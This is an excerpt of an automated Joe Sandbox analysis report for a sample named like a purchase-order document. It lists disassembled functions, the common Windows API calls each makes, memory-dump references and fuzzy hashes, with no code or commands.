Instruction Fuzzy Hash: 5A4167759452199FDF12EFA4DD81ADEB7F9AF19340F1000E6E505EB142EB34AB88CB50

Function 001D2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001D2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 001D2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 001D2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001D2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001D2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 001D2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001D2F0B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 7cd90f536d84bcd3963fd8dc0456b310fd7c3470d3d7e1df17ba171260ee276b
Instruction ID: 599472b55af0d19d54944a8898b2efecb5f8a8be3b66676a45c31f149ea7f1e9
Opcode Fuzzy Hash: 7cd90f536d84bcd3963fd8dc0456b310fd7c3470d3d7e1df17ba171260ee276b
Instruction Fuzzy Hash: DA3105306461519FDB21CF58EC88FA537E1EBAA711F1545A6FA208B3B1CB71E890DB41

Function 001A7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001A7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001A778F
SysAllocString.OLEAUT32(00000000), ref: 001A7792
SysAllocString.OLEAUT32(?), ref: 001A77B0
SysFreeString.OLEAUT32(?), ref: 001A77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 001A77DE
SysAllocString.OLEAUT32(?), ref: 001A77EC

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: e5132601d0a8c35231af8973f7d223a657499b7b44f90d637fc8cd0833b3a2e9
Instruction ID: 88de10e42c907a80d393e6fed6835e77b85bad0b2f95360766c8257a8be7d223
Opcode Fuzzy Hash: e5132601d0a8c35231af8973f7d223a657499b7b44f90d637fc8cd0833b3a2e9
Instruction Fuzzy Hash: D221B27A605219AFDB10DFE8CC88CBB73ACEB0A3647008526F914DB191D770DD81C7A0

Function 001A77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001A7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001A7868
SysAllocString.OLEAUT32(00000000), ref: 001A786B
SysAllocString.OLEAUT32 ref: 001A788C
SysFreeString.OLEAUT32 ref: 001A7895
StringFromGUID2.OLE32(?,?,00000028), ref: 001A78AF
SysAllocString.OLEAUT32(?), ref: 001A78BD

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a64837a926d4f2b85174d32959f5ce508fb93aca83f3352494346476acd2c1ce
Instruction ID: a8e81cfb9b40cd4e9fdfa3f12ac0d8572f335f68ebe95da47c56de110a16e64e
Opcode Fuzzy Hash: a64837a926d4f2b85174d32959f5ce508fb93aca83f3352494346476acd2c1ce
Instruction Fuzzy Hash: DE21A135609205AFDB109FA8DC88DBA77ECEF0A3607108525F915CB2A5D778DD81CBA4

Function 001B04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 001B04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001B052E

Strings

nul, xrefs: 001B0567

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: ee516f81dc173b006510a193077479a240b68e65e5d8811c6a61c144d5061278
Instruction ID: 90de4555b2270155c55be678620d056b8cee4fea00072e14af72265ad60e11fc
Opcode Fuzzy Hash: ee516f81dc173b006510a193077479a240b68e65e5d8811c6a61c144d5061278
Instruction Fuzzy Hash: A9218DB1500306AFDB319F69DC44ADB77E4BF49724F204A19F8A1D66E0D7709980CF60

Function 001B05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 001B05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001B0601

Strings

nul, xrefs: 001B0639

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 643c95bdcf0ac325b924eabc8fa3f985079c205a3f52952327a18a68902f4248
Instruction ID: 6096aaaf024e404108179e5c2b3a55de0286240fb15d65456655ba67c4956048
Opcode Fuzzy Hash: 643c95bdcf0ac325b924eabc8fa3f985079c205a3f52952327a18a68902f4248
Instruction Fuzzy Hash: B2214F755013169FDB219F69DC04ADB77E4BF99720F200B19F8A1E72E0E77099A0CB50

Function 001D40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0014600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0014604C
Part of subcall function 0014600E: GetStockObject.GDI32(00000011), ref: 00146060
Part of subcall function 0014600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001D4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001D411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001D412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001D4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001D4145

Strings

Msctls_Progress32, xrefs: 001D40E3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 5a3680587d2b02b42eb68cb4aa0871562a94250c1586f0006afc0f3d1ee77b28
Instruction ID: b90a277f43429b9b3a6bcea6516d566bbd3e181a8b342f77ba2e1a06a78c2ae2
Opcode Fuzzy Hash: 5a3680587d2b02b42eb68cb4aa0871562a94250c1586f0006afc0f3d1ee77b28
Instruction Fuzzy Hash: 321190B2150219BFEF118E64CC86EE77F6DEF19798F014111BB18A2190CB72AC61DBA4

Function 0017D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0017D7A3: _free.LIBCMT ref: 0017D7CC

_free.LIBCMT ref: 0017D82D

Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0

_free.LIBCMT ref: 0017D838
_free.LIBCMT ref: 0017D843
_free.LIBCMT ref: 0017D897
_free.LIBCMT ref: 0017D8A2
_free.LIBCMT ref: 0017D8AD
_free.LIBCMT ref: 0017D8B8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: ae259239f3e1c0009e2af7f360a4a2288260ad55ff94029eca6c7b50c8104110
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 8A118171540B18AAD621BFF0DC07FCBBBFC6F60704F448825F29DA6092DB34B6464651

Function 001ADA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001ADA74
LoadStringW.USER32(00000000), ref: 001ADA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001ADA91
LoadStringW.USER32(00000000), ref: 001ADA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 001ADADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 001ADAB9

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: cab72ff9c0cb3ef49c13b3ec1d49de5c2dae3b5c2ccf42da388e22ddd377ec29
Instruction ID: 505afd17c910c338be188217bf10d8742dde712292ee7fb24846dc6b79b94105
Opcode Fuzzy Hash: cab72ff9c0cb3ef49c13b3ec1d49de5c2dae3b5c2ccf42da388e22ddd377ec29
Instruction Fuzzy Hash: 8A0186F6501219BFE7109BA0DD89EFB336CE709301F400992B706E2441EA749EC48FB4

Function 001B096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00B7F198,00B7F198), ref: 001B097B
EnterCriticalSection.KERNEL32(00B7F178,00000000), ref: 001B098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 001B099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 001B09A9
CloseHandle.KERNEL32(00000000), ref: 001B09B8
InterlockedExchange.KERNEL32(00B7F198,000001F6), ref: 001B09C8
LeaveCriticalSection.KERNEL32(00B7F178), ref: 001B09CF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 972ca35f5cf0dbbf21f57e283f0c5576fa51793031d804701e479ac399d78982
Instruction ID: 1aa66b7094737d2a72707e7ddb6db4fc1b9989ad2949538c9f103dc07a735176
Opcode Fuzzy Hash: 972ca35f5cf0dbbf21f57e283f0c5576fa51793031d804701e479ac399d78982
Instruction Fuzzy Hash: 8BF0C932483A13BBDB525BA4EE89BD6BB29BF05706F402526F20290CA1C77594A5CFD0

Function 001C1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001C1DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001C1DE1
WSAGetLastError.WSOCK32 ref: 001C1DF2
htons.WSOCK32(?,?,?,?,?), ref: 001C1EDB
inet_ntoa.WSOCK32(?), ref: 001C1E8C

Part of subcall function 001A39E8: _strlen.LIBCMT ref: 001A39F2

Part of subcall function 001C3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,001BEC0C), ref: 001C3240

_strlen.LIBCMT ref: 001C1F35

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: c091624dcf7b5304b018879a7e90f2a785b5f513614597eccc2da1553af90233
Instruction ID: 2fc6b36ae03b3846a35380dd8835f816a57aa8db31a6737b932f1cfb7acfdfbb
Opcode Fuzzy Hash: c091624dcf7b5304b018879a7e90f2a785b5f513614597eccc2da1553af90233
Instruction Fuzzy Hash: 2FB1C031244340AFC324DF64C895F2A77A5AFA6318F54894CF46A5F2A3CB31ED46CB92

Function 00145D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00145D30
GetWindowRect.USER32(?,?), ref: 00145D71
ScreenToClient.USER32(?,?), ref: 00145D99
GetClientRect.USER32(?,?), ref: 00145ED7
GetWindowRect.USER32(?,?), ref: 00145EF8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 74e07a93c35605fd6c0daea83a9662f7a99135cb37b7be01362427c55728a92d
Instruction ID: 6ee8a133b0d981366a37c680d800d1e9b827b01a7edffa673a24a5f47c0b7f8a
Opcode Fuzzy Hash: 74e07a93c35605fd6c0daea83a9662f7a99135cb37b7be01362427c55728a92d
Instruction Fuzzy Hash: 89B17B35A0074ADBDB14DFA9C4807EEB7F2FF58310F14841AE8A9D7260DB34AA51DB54

Function 001701B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 001700BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001700D6
__allrem.LIBCMT ref: 001700ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0017010B
__allrem.LIBCMT ref: 00170122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00170140

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: b66069b34239fb593b31ecedcfb2b6004b575121753df8204644e4c2b4274f5f
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 50812972A00706EBE725AF68DC81B6B73F8AF55364F24813EF515D7281EB70DA418B50

Function 001761FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001682D9,001682D9,?,?,?,0017644F,00000001,00000001,8BE85006), ref: 00176258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0017644F,00000001,00000001,8BE85006,?,?,?), ref: 001762DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001763D8
__freea.LIBCMT ref: 001763E5

Part of subcall function 00173820: RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852

__freea.LIBCMT ref: 001763EE
__freea.LIBCMT ref: 00176413

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 64689ff0d3cee6541079243c9420c965cd5b6c9e9161f84ca9c956d899a361f7
Instruction ID: 316cde3967b888118ab99be07172af250fed35ca6b4497814ab1978f0315ec12
Opcode Fuzzy Hash: 64689ff0d3cee6541079243c9420c965cd5b6c9e9161f84ca9c956d899a361f7
Instruction Fuzzy Hash: 2B51E072A00A16ABEB298F64CC81EAF77B9EB58710F158629FC0DD6141EB34DC40D7A0

Function 001CBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Part of subcall function 001CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001CB6AE,?,?), ref: 001CC9B5
Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CC9F1
Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA68
Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001CBCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001CBD25
RegCloseKey.ADVAPI32(00000000), ref: 001CBD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001CBD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 001CBDF3
RegCloseKey.ADVAPI32(?), ref: 001CBDFF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: bd35ec564f5cc6e1c6264c08d68fbd443a87ed62867b5cc1b8a8f7d19da5f130
Instruction ID: a14a3b0b91426a912ee9e23068e8f323c201c63893b6292622aa09a8227caf66
Opcode Fuzzy Hash: bd35ec564f5cc6e1c6264c08d68fbd443a87ed62867b5cc1b8a8f7d19da5f130
Instruction Fuzzy Hash: 5A817A70208241AFD714DF64C8C6E2ABBE5FF94308F14895DF45A8B2A2DB31ED45CB92

Function 0019F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0019F7B9
SysAllocString.OLEAUT32(00000001), ref: 0019F860
VariantCopy.OLEAUT32(0019FA64,00000000), ref: 0019F889
VariantClear.OLEAUT32(0019FA64), ref: 0019F8AD
VariantCopy.OLEAUT32(0019FA64,00000000), ref: 0019F8B1
VariantClear.OLEAUT32(?), ref: 0019F8BB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: a12dc16a71eb9a3bba02e91fb4a06d6fd333116227c64057b01406353425c7d2
Instruction ID: fc2bc2319b07ae42df77af298a8b56f799503245bc1e1e084147d170d9d3f302
Opcode Fuzzy Hash: a12dc16a71eb9a3bba02e91fb4a06d6fd333116227c64057b01406353425c7d2
Instruction Fuzzy Hash: 7F51C131600310FACF24AF65D895B69B3A8EF55324B24846FF806DF292DB70CC46CB96

Function 001B910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00147620: _wcslen.LIBCMT ref: 00147625

Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 001B94E5
_wcslen.LIBCMT ref: 001B9506
_wcslen.LIBCMT ref: 001B952D
GetSaveFileNameW.COMDLG32(00000058), ref: 001B9585

Strings

X, xrefs: 001B9412

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
